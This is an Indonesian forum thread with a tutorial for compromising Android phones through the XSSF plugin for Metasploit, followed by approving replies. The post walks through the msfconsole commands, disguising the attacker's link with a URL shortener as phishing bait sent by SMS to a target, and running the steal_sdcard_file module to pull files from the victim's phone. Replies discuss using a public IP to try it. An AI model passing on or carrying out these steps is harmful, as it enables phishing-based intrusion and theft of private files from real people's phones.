Exploit Android Menggunakan Xssf
#1
halo semua selamat pagi Big Grin
di minggu yang cerah ini saya akan nyepam dikit. mohon jangan di masukin hati kalau ada yang kurang berkenan nanti ya :-bd
kalau misalnya sudah pernah ada yang posting saya minta maaf ya, jujur pada saat saya melakukan pencarian di forum tidak di temukan thread yang sama.
Spoiler! :
[Image: 1460990_689962617680709_1249227499_n.jpg]

kalau begitu langsung saja kita buka kali linux, backtrack, bugtraq, atau apapun yang penting bisa di pasang msfconsole ya.

langsung download dulu xssf pada directory msfconsolenya.
Quote:svn export http://xssf.googlecode.com/svn/trunk ./ --force
Spoiler! :
[Image: 1467453_689962744347363_873054418_n.jpg]

setelah itu kita jalankan metasploit kita \m/
Quote:msfconsole
dan isikan
load xssf Port=80 Uri=/Xssf/ Public=true Mode=Verbose
Spoiler! :
[Image: 1454734_689962704347367_1030133023_n.jpg]

lalu masukan
Quote:xssf_urls
maka akan muncul penampakan seperti ini
Spoiler! :
[Image: 1470402_689962774347360_487717187_n.jpg]
di atas itu adalah beberapa link yang merupakan ip dari attacker yang bisa di sembunyikan dengan tinyurl dll sebagai umpan pishing dan xssf home attacker dimana attacker bisa melihat log dari korban.

sekarang lihat msfconsole kita, dan copy link di sebelah [+] XSSF logs page dan paste ke web browser kesayangan anda.
Spoiler! :
[Image: 1470237_689962997680671_757338044_n.jpg]
maka akan muncul pemandangan seperti itu.

sekarang lihat lah bagian [+] XSSF test page dan copy link di sampingnya, lalu paste kirimkan ke android target anda lewat sms atau apapun. bisa di tutup menggunakan tinyurl atau semacamnya.
karena saya tidak punya android, maka saya pake vbox saja ya =))
Spoiler! :
[Image: 1453377_689962974347340_1417305574_n.jpg]

pada saat korban membuka link tersebut maka koban akan menyaksikan pemandangan seperti ini
Spoiler! :
[Image: 1455092_689963107680660_1504504363_n.jpg]

dan kita akan mendapatkan pemandangan seperti ini
Spoiler! :
[Image: 1422603_689963164347321_1348717999_n.jpg]
new victim registered. tandanya korban sudah tersambung dengan msfconsole kita, sekarang kita buka browser milik kita yang sudah di buka link xssf tadi. maka akan muncul log dari si korban
Spoiler! :
[Image: 1466217_689963174347320_466036619_n.jpg]
tinggal klik saja tulisan victimnya.

sekarang coba saja kita ketik
Quote:xssf_information 1
tadaaa. nongol dah tuh infonya si korban.
Spoiler! :
[Image: 994369_689963254347312_857904323_n.jpg]

sekarang android sudah resmi kena exploit, dan sekarang giliran kita untuk berkreasi mau di apakan android tersebut.
dengan:
Quote:search auxiliary/xssf

mau curi filenya?
bisa dengan memilih:
Quote:use auxiliary/xssf/public/android/steal_sdcard_file
Spoiler! :
[Image: 1461235_689963357680635_1083694086_n.jpg]
dan run
Spoiler! :
[Image: 1468557_689963344347303_1074165059_n.jpg]


dan secara otomatis android korban mengaksesnya dan nantinya akan muncul di log browser kita.
Spoiler! :
[Image: 1473054_689963364347301_888857908_n.jpg]

tapi berhubung android saya tidak ada isinya karena hanya virtual, jadi kagak muncul apa".

silahkan di kembangkan sendiri dan bila ada yang lebih asik, silahkan di postingkan ke forum.

mohon maaf kalau ada yang kurang berkenan. hanya share saja semoga bermanfaat \m/
Information Is The Most Dangerous Weapon In The World

#2
Yes I love backtrack, hihihi #ketawaJahat

#3
(11-24-2013, 08:08 AM)aristateles Wrote: Yes I love backtrack, hihihi #ketawaJahat

huwkwkkwk wah bahaya nih untung hapeku nokia 3315 =))
Information Is The Most Dangerous Weapon In The World

#4
itu pake ip publik ato gmna pak?
mau tes andro ane nih Big Grin
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

#5
pake ip publik bisa om. test aja. sesuaikan saja dengan ppp0 ente pak di ifconfig Big Grin
Information Is The Most Dangerous Weapon In The World

#6
ini baru namanya hacker :-bd
mantap bang tutornya :apn:

#7
Nice tutor... penarasan pengen nyoba, tapi hape ane tigatigalimablas... :v

#8
nambah ilmu nih.. boleh2 nih di coba, tapi ane kuliah dulu ya, hehe.. tahnks
Security awareness should be the continuing practice of a skill and not the continuous reminder of a threat.

#9
juoss gandoss om,, hehe
ntar coba2 deh,, jadi penasaran Big Grin

#10
wihh om sony makin ganteng aja nih Big Grin .. Nice tutornya om , cek lemari kulkas Big Grin
Jangan Makan Tulang Kawan | Kurawa |






Users browsing this thread: 1 Guest(s)